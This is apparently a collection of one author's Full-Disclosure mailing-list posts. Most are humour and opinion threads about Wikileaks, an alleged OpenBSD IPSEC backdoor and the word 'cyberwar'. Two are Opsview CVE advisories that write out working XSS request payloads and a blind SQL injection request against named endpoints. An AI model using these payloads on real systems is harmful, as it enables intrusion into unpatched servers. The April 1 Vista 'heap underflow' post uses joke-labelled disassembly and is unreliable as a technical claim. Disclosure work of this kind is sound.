[Full-disclosure] Security is fun(ny) again

2014-01-09 Thread J. Oquendo

Dozens of hundreds of years ago, I used to seek out the best
of best regarding computer security. I sought them out to
read the material they wrote. This went from BBS text files,
to forums, IRC over to blog posts. Anything these folks may
have made, videos they may uploaded with regards to
security, you name it. I did so because this is how I began
to learn computer security. Initially, I was intimidated by
security folks, but eventually I learned, many are not only
the smartest thinkers, but they're funny, they're cool, and
most of all they're human.

As time went on, I began contacting some of them, asking
them questions, secretly being mentored by their answers,
posts to mailing lists, and so forth. My digital rolodex
grew, as did my knowledge. As an individual, I have an
odd-ball sense of humor. Sort of dry, sort of dark. I then
began asking off the cuff questions in an interview format
to these peers. This all began circa 1997... And now its
back to haunt my security peers since I became the most
awesomest, handsomest, and feared thirteen thirty sevener
since Thomas A. Anderson.

Without further rambling, an AntiOffline redux Top Ten
where security peers are asked the things that matter...
to me

For the redux launch, I hunted down Charlie Miller who
was likely hacking a car on a highway or something. I
managed to get his attention after a denial of service
mailbomb using a Win98 mailbomber app, till he had no choice
but to answer the questions, or face a million repeat msgs.

Top Ten with Charlie Miller
www.infiltrated.net/index.php?option=com_contentview=articleid=69


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

Where ignorance is our master, there is no possibility of
real peace - Dalai Lama

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View

2013-10-29 Thread J. Oquendo
CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View
Version(s): Opsview pre 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)


I. ADVISORY

Title: Multilple Cross Site Scripting (XSS) Attacks in Ops View
Date published: 2013-10-28
Vendor contacted: 2013-09-04


II. BACKGROUND

Opsview is a systems management software built on open
source software. To minimize noise, read more about it
here

http://www.opsview.com/about-us


II. DESCRIPTION

Opsview is vulnerable to a few different XSS based attacks.

/admin/auditlog
/info/host/
/login
/status/service/recheck
/viewport/

There are a variety of iterations within those functions
which may allow a malicious user to trigger a cross site
scripting attack.


III. EXAMPLE

GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT 
HERE%3e HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]



GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]



POST /login HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

app=OPSVIEWback=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22login=Sign+inlogin_password=nologin_username=no



POST /status/service/recheck HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22host_selection=opsviewservice_selection=opsview%3bConnectivity%20-%20LANsubmit=Submit



GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

III SOLUTION

Opsview released a fix with Opsview 4.4.1
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

Where ignorance is our master, there is no possibility of
real peace - Dalai Lama

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CVE-2013-5694 Blind SQL Injection in Ops View

2013-10-29 Thread J. Oquendo
CVE-2013-5694 Blind SQL Injection in Ops View
Version(s): Opsview pre 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)


I. ADVISORY

Title: Blind SQL Injection in OpsView
Date published: 2013-10-28
Vendor contacted: 2013-09-04


II. BACKGROUND

Opsview is a systems management software built on open
source software. To minimize noise, read more about it
here

http://www.opsview.com/about-us


II. DESCRIPTION

A Blind SQL injection vulnerability exists in OpsView
acknowledge function. A malicious user can post bad data
leading to a database dump, user creation, code execution,
etc.

POST /status/service/acknowledge HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

comment=from=http%3a%2f%2f10.20.30.68%2fstatus%2fhostgroupnotify=1service_selection=%24%7dsql
 injection goes 
here%7dsubmit=Submit

For more on BSQLI read about it here:

http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_injection


III SOLUTION

Opsview released a fix with Opsview 4.4.1
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

Where ignorance is our master, there is no possibility of
real peace - Dalai Lama

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Gauss is out !

2012-08-09 Thread J. Oquendo
On 8/9/2012 9:43 AM, Peter Dawson wrote:

 Dubbed Gauss, the virus may also be capable of attacking critical 
 infrastructure and was built in the same laboratories as Stuxnet, the 
 computer worm widely believed to have been used by the United States 
 and Israel to attack Iran's nuclear program, Kaspersky Lab said on 
 Thursday.

 http://www.reuters.com/article/2012/08/09/net-us-cybersecurity-gauss-idUSBRE8780NJ20120809
  

 /pd


And it just took over Mars Rover Curiosity!
http://www.infiltrated.net/index.php?option=com_contentview=articleid=54

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

CCEC BDEE 74ED 0575 8104  7B90 B60D 6401 56CC DBEA
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xB60D640156CCDBEA

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Flame - couldn't resist

2012-06-15 Thread J. Oquendo

It's Friday and I couldn't resist. Someone needs to do a VoiceOver -ala 
Direct TV, for AV companies

When you use Windows, hackers target your machines.
When hackers target your machine, you get compromised aad become part of 
a botnet
When you become part of a botnet, your machine attacks Iranian nuclear 
facilities
Don't let Windows attack nuclear facilities switch to McAfee.

http://www.youtube.com/watch?v=mcYWvvv75dM

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

CCEC BDEE 74ED 0575 8104  7B90 B60D 6401 56CC DBEA
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xB60D640156CCDBEA

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] STEP Security

2012-04-01 Thread J. Oquendo
Interweb Re-Engineering Task Force   J. Oquendo
Request for Comments 4012012  E-Fensive Security Strategies
Category: Informational
Expires: 2020


   STEP by STEP Security


Status of this Memo

   This Internet-Draft is submitted in full nonconformance with
   provisions of BCP 78 and BCP 79. This document may not be modified,
   and derivative works of it may not be created, except to publish it
   as an RFC and to translate it into languages other than English.
   Internet-Drafts are working documents of the Internet Engineering
   Task Force (IETF), its areas, and its working groups.   Note that
   other groups may also distribute working documents as Internet-
   Drafts.

   Internet-Drafts are draft documents valid for a maximum of six
   months and may be updated, replaced, or obsoleted by other documents
   at any time.   It is inappropriate to use Internet-Drafts as
   reference material or to cite them other than as work in progress.

   The list of current Internet-Drafts can be accessed at
   http://www.ietf.org/ietf/1id-abstracts.txt

   The list of Internet-Draft Shadow Directories can be accessed at
   http://www.ietf.org/shadow.html

   This Internet-Draft will expire on April 01, 2020.

Copyright Notice

   Copyright (c) 2012 IETF Trust and the persons identified as the
   document authors. All rights reserved.

   This document is subject to BCP 78 and the IETF Trust's Legal
   Provisions Relating to IETF Documents
   (http://trustee.ietf.org/license-info) in effect on the date of
   publication of this document. Please review these documents
   carefully, as they describe your rights and restrictions with
   respect to this document. Code Components extracted from this
   document must include Simplified BSD License text as described in




Oquendo  Expires Apr 01, 2020  [Page 1]


Internet-Draft  Security Step by STEP   RFC 4012012


   Section 4.e of the Trust Legal Provisions and are provided without
   warranty as described in the Simplified BSD License.

Abstract

   This framework describes a practical methodology for ensuring
   security in otherwise insecure environments. The goal is to provide
   a rapid response mechanism to defend against the advanced persistent
   threats in the wild.

Table of Contents


   1.  Introduction..2
   2.  Conventions used in this document.4
   3.  Threats Explained.4
   3.1. Possible Actors..4
   4.  STEP Explained5
   5.  STEP in Action6
   6.  Security Considerations...7
   7.  IANA Considerations...7
   8.  Conclusions...8
   8.1. Informative References...8
   9.  Acknowledgments...8
   Appendix A.  Copyright9


1. Introduction
   In the network and computing industry, malicious actions,
   applications and actors have become more pervasive. Response times
   to anomalous events are burdening today's infrastructures and often
   strain resources. As networks under attack are often saturated with
   malicious traffic and advanced persistent threat actors engage in
   downloading terabytes of data, resources to combat these threats
   have diminished.

   Additionally, the threats are no longer just anonymized actors
   engaging in juvenile behavior, there are many instances of State
   Actors, disgruntled employees, contractors, third party vendors and
   criminal organizations. Each with separate agendas, each
   consistently targeting devices on the Internet.




Oquendo Informational  [Page 2]
Internet-Draft Security Step by STEP   RFC 4012012


   The intent behind this document is to define a methodology for rapid
   response to these threats. In this document, security will be
   achieved using a new methodology and protocol henceforth named
   Scissor To Ethernet Protocol (STEP).



   Initially designed as a last approach for security, STEP ensures
   that no attacker can disaffect any of the Confidentiality,
   Integrity, Availability of data as a whole.



   Many variables are involved in security, but the STEP methodology
   focuses on the following:


   o FUD (Fear Uncertainty and Doubt)
   o SCAM (Security Compliance and Management)
   o APT (Another Possible Threat)



   This methodology proposes STEP that SHOULD be performed at the onset
   of a cyber attack before more terabytes of data are exfiltrated from
   a network.

   1. Industry Standard IP

[Full-disclosure] Earth to Facebook

2012-03-15 Thread J. Oquendo
Earth calling Facebook security engineers, earth calling Facebook 
security engineers. Tried reaching out to you guys about a vulnerability 
a good friend discovered. No one should have to hunt you guys down in an 
effort to assist you with security flaws.


--
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Android Noise Camera Application Released

2011-05-23 Thread J. Oquendo
On 5/23/2011 3:29 PM, SecurityXploded Group wrote:
 Hi all,

 Android Noise Camera is the FREE mobile application designed to help
 in remote monitoring by capturing the images whenever there is high
 level of noise around the mobile device.
 It automatically takes the pictures from your mobile's camera whenever
 the noise level in the area surrounding the phone exceeds the
 threshold limit. You can configure NoiseCamera to store the pictures
 in SD card as well as automatically email it to you.

 It is simple, easy to use Android application created by one of our
 contributor - JavaAngelo.


Now remember children, you must tweak this app prior to going to your
local rave, club, prom, etc. otherwise kiss your SD storage sayanora

-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Microsoft VISTA TCP/IP heap buffer underflow

2011-04-01 Thread J. Oquendo

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
Microsoft VISTA TCP/IP heap buffer underflow

Summary
- -
Microsoft Device IO Control wrapped by an API shipping with Windows
Vista 32 bit and 64 bit contains a possibly exploitable, buffer
underflow corrupting kernel memory.


Affected Systems
- -

Using the sample proof of concept, it was possible to verify this
issue on following operating systems and configurations:

* Microsoft Windows Vista Ultimate 32 bit

It is very likely that other versions of Windows Vista are affected by
this issue.

This issue did not occur on Windows XP, Windows 2003 Advanced Server,
Windows 2008 Server nor Windows Millenium Edition

Re-installation of Service Pack 1 and/or upgrading to SP2 had any
effect in regards to resolve the random crashes.

To execute either the sample program or any other system command, the
user has to be either the admin, in the admin group or the
Administrators group.

Since this buffer underflow never makes it to kernel memory, it could
be possible that propping up the underflow will make it overflow and
take control over the operating system without any restriction.

Remedy
- 
No remedy available at this time.

Reported
- 
This vulnerability is being reported now


Relevant
- 
934b7a5c 85aa6fe4  934b7ac4 837100ee
tcpip!IppCreateUnicastRoute+0xf0
934b7ae8 85a5d121 0001 858b6278 84d74ce8
tcpip!IppValidateSetAllRouteParameters+0x217
934b7b64 85a18a29 836c134c  92a84a70
tcpip!Ipv4SetAllRouteParameters+0x1d1
934b7ba4 8a844551 0001 92a326b4 
NETIO!NsiSetAllParametersEx+0xbd
934b7bf0 8a844eb8  836c1330 836c1378
nsiproxy!NsippSetAllParameters+0x1b1
934b7c14 8a844f91 92a32601  8371d290
nsiproxy!NsippDispatchDeviceControl+0x88
934b7c2c 818f0053 8590b448 92a32698 92a32698 nsiproxy!NsippDispatch+0x33
934b7c44 81a80515 8371d290 92a32698 92a32708 nt!IofCallDriver+0x63
934b7c64 81a80cba 8590b448 8371d290 0027f700
nt!IopSynchronousServiceTail+0x1d9
934b7d00 81a6a98e 8590b448 92a32698  nt!IopXxxControlFile+0x6b7
934b7d34 8188ba7a 0044 0048  nt!NtDeviceIoControlFile+0x2a
934b7d34 77529a94 0044 0048  nt!KiFastCallEntry+0x12a
0027f68c 77528444 777214b9 0044 0048 ntdll!KiFastSystemCallRet
0027f690 777214b9 0044 0048 
ntdll!ZwDeviceIoControlFile+0xc

 Disassembly with commands 

mov edi,edi
push ebp
mov ebp,esp
push edi
mov edi,dword ptr [ebp+8]
lea eax,[ebp+8]
push eax
push dword ptr [edi+4]
push 18h
call NOMNOM!RtlULongAdd (85a1675d)
test eax,eax
jl OMNOM!PtpCreateNOM+0x1b
push esi
push 74704D4Eh
push dword ptr [ebp+8] ; = 0x0020
push 0
call ExAllocatePoolWithTag ; eax = ExAllocatePoolWithTag(0, 0x20,
0x74704D4E, esi);
mov esi,eax ; = 0x83716380 allocated buffer address
test esi,esi
je NOM!CreateOMNOM+0x6d
push dword ptr [ebp+8] ; = 0x0020
push 0
push esi ; 0x83716380 allocated buffer address
call NOM!memset (85a10543) ; memset((char*)0x83716380, 0, 0x20)
mov eax,dword ptr [ebp+14h]
mov dword ptr [esi],eax
mov eax,dword ptr [ebp+18h]
mov dword ptr [esi+0Ch],eax
mov dword ptr [eax],esi
mov eax,dword ptr [ebp+0Ch]
and word ptr [esi+14h],0
add esp,0Ch
push eax ; = 0x837100ee
lea eax,[esi+18h] ; esi unchanged, holds the alloc. buffer address
(=0x83716380)
push eax ; = 0x83716398 add offset of 0x18 bytes to the allocated buffer
inc dword ptr [edi+8]
mov eax,esi
pop esi
pop edi
pop ebp
ret 14h
nop
nop
nop
om
nom
nom


- -- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iD8DBQFNlhDEK/fYPyEKla8RAnWXAJ0XaB/D0Cd0eYt+6Vd00Tx6RYsRmQCfWwGk
QGt6mpCUiDKXxhCdg5xpi7M=
=pjws
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-16 Thread J. Oquendo

I can only speculate the following with regards to Perry coming out
of the blue with this news and it obviously means nothing as I'm not
a profiler, psychologist, etc. and even if I were, who cares at the
end of the day.

There is probably some form of credibility to perhaps the government
wanting to backdoor OpenBSD or any other operating system but that
obviously does not mean this occurred.

What I think about his disclosure is, Perry sought to make something
known to Theo which took Theo by surpise and Theo being who he is
disclosed it to the public. The following strike me as odd though:

I have never seen Theo come out of the blue publicly for something
non-BSD related. I never struck him as the type to put his business
out there especially in a case like this.

My thoughts are: If he DID know something, why would he PUBLICLY out
himself like that. It would have made more sense for him to keep
that conversation private and lie enough to dissuade this Perry go
to hush/think about things differently, etc.

I'm think if it were me, I would have done the same had I no
knowledge. Had I knowledge, my first thought would be: By publicly
disclosing anything, the people I report(ed) to will be pissed and
it'll kick up a firestorm (this is for those who speculate Theo
had something to do with this).

So I think, what does this Perry guy have against the others. Are
there any documented exchanges or disagreements between Perry,
Wright or Lowe? For someone to come out of the blue, name names 10
years later makes little sense. It must have been a hell of a bone
to grind to wait 10 years once an NDA has expired to out someone.
For that, an anonymous email to a mailing list would have sufficed
as opposed to waiting 10 years.

I then think, wait a minute, something like this (backdooring
anything) must go beyond a 10 year NDA. Even if it didn't, the
potential blowback Perry could face would be so enormous, it would
not only be insane to come out of the woodworks, but likely career
suicide as well. The 'bone to pick' doesn't sound realistic. After
all, he could have submitted an anonymous email years ago to
air his dirt.

What I believe happened is an iteration of rumors. Perhaps there
came a time when an agency in government wanted to place backdoors,
maybe even approached BSD developers [1]. Did it fly? Only three
people would completely know at the end of the day: Perry, Scott
Lowe (whomever he is) Jason Wright.

Would you like to help the government... We need you to ... which
after time became the government placed a backdoor. Ten years is
an awful long time to sit around with whiffs of news like this. I
doubt a secret like that could have been kept secret for 10 long
years. At the same time though, I doubt there is reason for Perry
to outright make this up. I think maybe he heard a rumor and
rolled with it.

I've re-read Perry's email to Theo and another response. His
initial e-mail didn't impose a sense of payback is a bitch
but more of a I think you should know so for those claiming he
wanted to get back at Theo you may be oblivious to the fact that
he sent the email to Theo in private, not to a mailing list. That
debunks any notion to me that he was trying to hurt Theo. He
would have had to have known 100% that Theo would disclose the
email. So the point of him coming out of the closet to hurt Theo
is weak and moot if you ask me.

As for the credibility of a former agent saying we tried it
didn't work sounds fishy as well. I don't know about anyone else
but I can't imagine him admitting to anything sure we backdoored
it That wouldn't make any sense and would likely make him a few
enemies both on and off that agency.

At the end of the day though, I could honestly care less if
they backdoored my VPN. They'd be might bored wondering why
terminals are always tail -f'ing, and how the hell I manage to
type so much without shutting up ;)


[1] https://twitter.com/ejhilbert/status/14891845825863680


-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-15 Thread J. Oquendo
On 12/15/2010 1:55 PM, bk wrote:
 On Dec 15, 2010, at 10:32 AM, Paul Schmehl wrote:

 --On December 14, 2010 8:40:14 PM -0500 b...@fbi.dhs.org wrote:
 http://www.downspout.org/?q=node/3

 Seems IPSEC might have a back door written into it by the FBI?

 So for 10 years IPSEC has had a backdoor in it and not one person examining 
 the code has noticed it? snip

 Read The Cathedral and The Bazaar.

 -- 
 Paul Schmehl, Senior Infosec Analyst
 I call bullshit on all the people claiming this couldn't possibly have 
 existed because anyone can read the source.  How many of you understand 
 crypto.  OK, now how many of you _actually_ understand crypto?  And of those, 
 how many look at *BSD?

 There have been plenty of recent examples of Open Source projects that have 
 had undetected security flaws for multiple years.  It's not difficult to 
 believe a relatively uncommon OS could have a subtle weakness in a 
 difficult-to-understand part of the code.

 In this particular case, it looks to be total FUD by some lunatic with an axe 
 to grind, but we shouldn't be so arrogant to assume that such a flaw _could 
 not_ exist.

 BTW I actually use OpenBSD on many of my systems and I happen to think it's a 
 very simple and practical OS, but I'm not blind to potential problems.

 --
 chort
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

2cents

I take the Devil's Advocate approach here: We assume all the code in
OpenBSD is audited for one. Secondly I quote Juvenal: */Quis custodiet
ipsos custodes /*Who is to say the person auditing the code wasn't the
one who backdoored the code, this assuming there is or was a backdoor.
Thirdly, by Theo coming clean and offering disclosure to the public,
it could remove the potential of being exposed via pre-emptive strike.
If he stays shut and is exposed further down the road, it leads to more
questioning. Again, this is assuming that 1) there is a backdoor 2) Theo
somehow knew.

Furthermore, to think along the lines of So for 10 years IPSEC has had
a backdoor in it and not one person examining the code has noticed it,
I too concur with the fact that crypto is a very specific and
specialized area which many would not have the capabilities to audit.
Because open source projects like OpenBSD are built around trust, there
is no way to validate who is working on what. What does one propose in
an area like an OpenBSD project? Background checks for all their
developers, this would not solve the problem.

I personally don't believe based on Theo's demeanor and approach to
security that he would have allowed this let alone KNOWN that it
occurred. However, the reality is, who is watching the watchers

/2cents

-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WikiLeaks

2010-10-08 Thread J. Oquendo
Harry Behrens wrote:

 If you don't understand why something like Wikileaks being down with no 
 obvious reason or explanation is an issue - then I guess continue 
 sleeping...
 And it is indeed a security issue - in fact of international proportions..

   

Oh please. The world does not stop for Wikileaks going down in fact, I
guarantee you that in over 90% of the places you will visit this week,
no one will know or even care that Wikileaks is down.

Security issue of international proportions my ass. Life goes on,
people go on, no government, agency, official, business nor individual
stopped functioning, living, breathing because Wikileaks went down.

Reality is, outside of a very small segment of individuals, no one
cares to be quite frank. To prove this point, ask the next 10 people you
say: Do you know Wikileaks is down!? and study their response. Wanna
bet 99% will respond something similar to one of the following:

So?
What's Wikileaks?
Why would Wikipedia be down?
Who cares
What do they do?
Why should I care
And this has what to do with me?


-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] WikiLeaks

2010-10-08 Thread J. Oquendo
Jonathan Kamens wrote:
 J. is not so sanguine about the mission of Wikileaks and/or how well it 
 fulfills it and/or how important it is for protecting our lives and 
 liberties.  As we see from this comment:
   

How well it protects who's liberties. Show me some factual information
on where it saved anything for anyone. Or please explain to me and
perhaps the thousands of soldiers from ALL SORTS of countries in
Afghanistan, etc, how its protecting them by outing information with
regards to military operations. Give me a break, I've been there, done
that and to be honest, I grew up a while ago so spare the give me
Wikileaks or give me death speech. Wikileaks wasn't the first, nor will
it be the last.


 In any case, if I'm right that this is the kind of security issue that 
 J. was referring to, then I agree with others who have said that this 
 discussion does not belong on full-disclosure, and this will be my first 
 and last message on the topic.

   

1) Security regarding network and or computing related capabilities,
contexts, etc There is no purpose to the initial message and or thread
2) Security regarding wikileaks defending against ANYTHING other than
someone's own pockets... Is also irrelevant.

Perception and reality are two different equations to any interpretation
of fact/story/etc. while you and others like you believe Wikileaks! -
Defender of Justice I see Wikiwhore - Take the money and run

Again, been there done that when I ran, Politrix way before wikileaks
became a site, been there done that with JYA/Cryptome, been there done
that with J Orlin Grabbe (RIP) and the list goes on. Spare me and the
list the dramatics.

-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] SANS ... CERT Handler

2009-08-27 Thread J. Oquendo

Can one of you guys shoot me an email

-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] can someone please try and explain to me....

2009-07-09 Thread J. Oquendo
valdis.kletni...@vt.edu wrote:
 On Thu, 09 Jul 2009 13:06:58 EDT, J Michael Graham said: 
   
 Man, I LOVE sayin it. I say it all the time. Boss comes in talking  
 about budget cuts, I just stand up shouting CYBERWAR!! and he backs  
 out the doorway. Mission accomplished.
 

 I find completing sentences with As prophesied in ancient scripture does
 that to bosses too.

 The problem is that most of what we've seen has been more properly described
 as 'cyber-espionage' or 'cyber-border-skirmish'.  But most journalist's eyes
 glaze over if there's more than 7-8 letters in the word, so we're stuck with
 them using 'cyberwar'.
   
 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

I personally find that it's more appealing and spookier to say
cyberwar if you want to pass through - I don't know - your agenda,
your budget. Nothing says We're underfunded from contractors more than
cyberwar. Remember, many quotes come from many-a-DoD-contractor. Keep
that in mind, when the sayings slash quotes shift from Korea is
e-nuking us to we can neither confirm nor deny or we simply don't
know you have to look at who's talking:

In the dozens of instances that I worked over the past decade, I cannot
